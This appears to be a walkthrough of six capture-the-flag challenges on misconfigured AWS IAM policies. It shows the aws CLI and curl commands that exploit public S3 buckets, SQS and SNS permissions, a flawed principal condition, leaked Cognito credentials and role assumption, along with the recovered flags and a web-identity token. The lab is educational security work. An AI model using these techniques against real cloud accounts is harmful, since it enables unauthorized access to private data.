Skip to main content

Challenge 1 - Buckets of Fun

We all know that public buckets are risky. But can you find the flag?
IAM Policy
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}
From the IAM policy we can see that anyone can download or List an object from the bucket thebigiamchallenge-storage-9979f4b You can use the terminal provided in the same page itself to execute and test out the commands 
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
2023-06-05 19:13:53         37 flag1.txt
2023-06-08 19:18:24      81889 logo.png

aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
{wiz:exposed-storage-risky-as-usual}

Challenge 2 - Google Analytics

We created our own analytics system specifically for this challenge. We think it’s so good that we even used it on this page. What could go wrong? Join our queue and get the secret flag.
IAM Policy
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}
From the IAM policy we’ll be able to send and receive SQS messages from wiz-tbic-analytics-sqs-queue-ca7a1b2 . A queue URL in terms of AWS refers to a unique URL that is used to access a queue within the Amazon Simple Queue Service . Lets see if receive any message by forming a queue URL 
aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2
{
    "Messages": [
        {
            "MessageId": "c451d297-986c-4648-822a-60956ddcc497",
            "ReceiptHandle": "AQEBrO6F0xkzafMfOJX7VlnLRAOyt87sjvPfIDKcuzn/FOMFZnyx2A9mo6P9HQuSZbxHymiwFhwFj28MqJRMprjYwhilVWlfQP1DlMFm0BIPmrMdAwmwZq/fW5UVfIx/BCUVt4uwkfdsuKb
Hg/tNDUzdhsjS579K3/Vu5pxc5CbU0wAftpf+YB7i0kwriSiZI8/4fx9CWvlQ9tlsyAje7b5SERhT9a815oVnrTp7dCiX/1rdh3zRJLds+1eFjHngWeSq8lAOZ1PaakES14wYwEZ0DQObL6Ga8iMCvX0K0D84twgBmYlWKfod84tJ
KN0822zBdM6PaCHekoe2yl8bCQfCgTzRsPKgFMJ3bgvh+0gscvq1Ddmur6td/3IXEymjSmtFHLBuEoE999qSDVgC8eObDEBcABnVP2uqY+FX7kxaQWI=",
            "MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd",
            "Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL
-MM/1.4.3714\", \"IsAdmin\": true}"
        }
    ]
}
In the received message we can see a URL, we can check it out by simply using curl 
curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
{wiz:you-are-at-the-front-of-the-queue}

Challenge 3 - Enable Push Notifications

We got a message for you. Can you get it?
IAM Policy
{
    "Version": "2008-10-17",
    "Id": "Statement1",
    "Statement": [
        {
            "Sid": "Statement1",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "SNS:Subscribe",
            "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
            "Condition": {
                "StringLike": {
                    "sns:Endpoint": "*@tbic.wiz.io"
                }
            }
        }
    ]
}
From the policy we can see that anyone is allowed to subscribe to notifications from TBICWizPushNotifications on one condition which is the endpoint should end with @tbic.wiz.io As we do not have an email ending in that domain we can use another protocol like HTTPS to subscribe to it using webhooks. (https://webhook.site) 
aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint https://webhook.site/{your-assigend-id}/@tbic.wiz.io
In the webhook dashboard you can see a POST notification for Subscription confirmation, To confirm the subscription to the notifications visit the URL from SubscribeURL in the confirmation message. You’ll receive the flag as the message once you confirm

Challenge 4 - Admin only?

We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?
IAM Policy
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                },
                "ForAllValues:StringLike": {
                    "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
                }
            }
        }
    ]
}
The policy allows anyone to download objects from the bucket thebigiamchallenge-admin-storage-abf1321 and anyone can list the objects on the condition that the prefix should be files/* and the user arn is arn:aws:iam::133713371337:user/admin 
curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321?prefix=files/"
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Name>thebigiamchallenge-admin-storage-abf1321</Name><Prefix>files/</Prefix><Marker></Marker><MaxKeys>1000<
/MaxKeys><IsTruncated>false</IsTruncated>
<Contents>
    <Key>files/flag-as-admin.txt</Key>
    <LastModified>2023-06-07T19:15:43.000Z</LastModified>
    <ETag>"e365cfa7365164c05d7a9c209c4d8514"</ETag>
    <Size>42</Size>
    <StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
    <Key>files/logo-admin.png</Key>
    <LastModified>2023-06-08T19:20:01.000Z</LastModified>
    <ETag>"c57e95e6d6c138818bf38daac6216356"</ETag>
    <Size>81889</Size>
    <StorageClass>STANDARD</StorageClass>
</Contents></ListBucketResult>
From the response we can see that there are 2 objects we can get out of which one is the flag 
curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt"
{wiz:principal-arn-is-not-what-you-think}

Challenge 5 - Do I know you?

We configured AWS Cognito as our main identity provider. Let’s hope we didn’t make any mistakes.
IAM Policy
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}
We can see that the policy allows all actions within the Cognito Sync Service. Allows to download and list any object from the bucket wiz-privatefiles We know that the Cognito Service is being used but we need to find the identity pool id to make calls to the application. The AWS cognito image you see on the screen is being hosted on the wiz-privatefiles bucket we can see that if we open the image in a new tab. If you check the source code of the challenge page we can find the Cognito Service creds. B1 Avi You can open devtools and the check config creds in console B2 Pn 
export AWS_ACCESS_KEY_ID= <given key>
export AWS_SECRET_ACCESS_KEY= <given key>
export AWS_SESSION_TOKEN= <given key>

aws s3 ls s3://wiz-privatefiles/
2023-06-06 01:12:27       4220 cognito1.png
2023-06-05 18:58:35         37 flag1.txt

aws s3 cp s3://wiz-privatefiles/flag1.txt -
{wiz:incognito-is-always-suspicious}

Challenge 6 - One final push

Anonymous access no more. Let’s see what can you do now. Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role
IAM Policy
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}
This IAM policy allows identity us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b to assume role. 
> aws cognito-identity get-id --region us-east-1 --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
    "IdentityId": "us-east-1:157d6171-ee1b-c968-98c2-7c97c13d98d2"
}

> aws cognito-identity get-open-id-token --region us-east-1 --identity-id us-east-1:157d6171-ee1b-c968-98c2-7c97c13d98d2
{
    "IdentityId": "us-east-1:157d6171-ee1b-c968-98c2-7c97c13d98d2",
    "Token": "eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWUxYi1jOTY4LTk4YzItN2M5N2MxM2Q5OGQyIiwiYXVkIjoidXMtZWFzdC0
xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDM2Nzc0NjEs
ImlhdCI6MTc0MzY3Njg2MX0.luizXdcTC1LynFdtYdMBgaRZPFTLLLUPUsQePAuCG6P9IIXMZb7RwYw4RsDhHDwWB9H9T4Ln6gmnDHmyGIzxhuswMoX9DMHT_z8ckkEpxLJv63Bl4AXtiFmvdzBanfIpog9mEC80C-iYnHvUmWuoD
l7pwC6b1wCN4MgYwmxtByTDiUxSUNGxnHycfx8mebQlYuZG549EXGP_Av9vlJsfeakW4uv8XgvGkFXOQ69XxrHuz6NFQjBBfloF9M6WiuA7AJUHDtcNWWL9_jfcrZcIHJP1bZNyIS3J2VRnmD_HJX_C0qxlEhrhh1H80T0RzSvnZn
1sv8sji9EVRAoLJ3aXKw"
}

> aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name iam-challenge-6 --web-identity-token 'eyJraWQiOiJ1cy1lYXN0LTEtNyIsInR5cCI6IkpXUyIsImFsZyI6IlJTNTEyIn0.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWUxYi1jOTY4LTk4YzItN2M5N2MxM2Q5OGQyIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3NDM2Nzc0NjEsImlhdCI6MTc0MzY3Njg2MX0.luizXdcTC1LynFdtYdMBgaRZPFTLLLUPUsQePAuCG6P9IIXMZb7RwYw4RsDhHDwWB9H9T4Ln6gmnDHmyGIzxhuswMoX9DMHT_z8ckkEpxLJv63Bl4AXtiFmvdzBanfIpog9mEC80C-iYnHvUmWuoDl7pwC6b1wCN4MgYwmxtByTDiUxSUNGxnHycfx8mebQlYuZG549EXGP_Av9vlJsfeakW4uv8XgvGkFXOQ69XxrHuz6NFQjBBfloF9M6WiuA7AJUHDtcNWWL9_jfcrZcIHJP1bZNyIS3J2VRnmD_HJX_C0qxlEhrhh1H80T0RzSvnZn1sv8sji9EVRAoLJ3aXKw'

{
    "Credentials": {
        "AccessKeyId": <given key>,
        "SecretAccessKey": <given key>,
        "SessionToken": <given key>,
        "Expiration": "2025-04-03T11:42:30Z"
    },
    "SubjectFromWebIdentityToken": "us-east-1:157d6171-ee1b-c968-98c2-7c97c13d98d2",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:iam-challenge-6",
        "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/iam-challenge-6"
    },
    "Provider": "cognito-identity.amazonaws.com",
    "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}

> export AWS_ACCESS_KEY_ID=<given key>
> export AWS_SECRET_ACCESS_KEY=<given key>
> export AWS_SESSION_TOKEN=<given key>


> aws s3 ls
2024-06-06 11:51:35 challenge-website-storage-1fa5073
2024-06-06 13:55:59 payments-system-cd6e4ba
2023-06-04 22:37:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 18:37:44 thebigiamchallenge-admin-storage-abf1321
2023-06-04 22:01:02 thebigiamchallenge-storage-9979f4b
2023-06-05 18:58:31 wiz-privatefiles
2023-06-05 18:58:31 wiz-privatefiles-x1000

> aws s3 ls wiz-privatefiles-x1000
2023-06-06 01:12:27       4220 cognito2.png
2023-06-05 18:58:35         40 flag2.txt

> aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt -
{wiz:open-sesame-or-shell-i-say-openid}
Cet1 Avi